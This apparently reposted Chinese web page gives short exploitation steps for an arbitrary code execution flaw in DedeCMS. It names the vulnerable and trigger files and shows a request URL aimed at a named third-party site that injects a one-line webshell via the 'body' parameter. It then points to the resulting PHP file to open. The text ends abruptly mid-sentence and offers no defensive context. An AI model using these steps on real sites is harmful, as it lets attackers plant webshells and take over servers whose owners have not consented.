织梦网任意代码执行漏洞 -电脑资料

电脑资料时间：2019-01-01 我要投稿

【www.unjs.com - 电脑资料】

http://www.xssor.cn/sa

用dedecms 朋友还是小心点吧，

。

漏洞页面是 \include\inc_bookfunctions.php

触发页面是 member/story_add_content_action.php

接着就是打开下面的地址：

http://www.guo3.com/member/story_add_content_action.php?chapterid=1&arcID=1&body=?>后面加上一句话代码，

《织梦网任意代码执行漏洞》(https://www.unjs.com)。当你看到成功的提示就表示成功了。

然后打开http://www.guo3.com/data/textdata/1/bk1.php就是我们

相关文章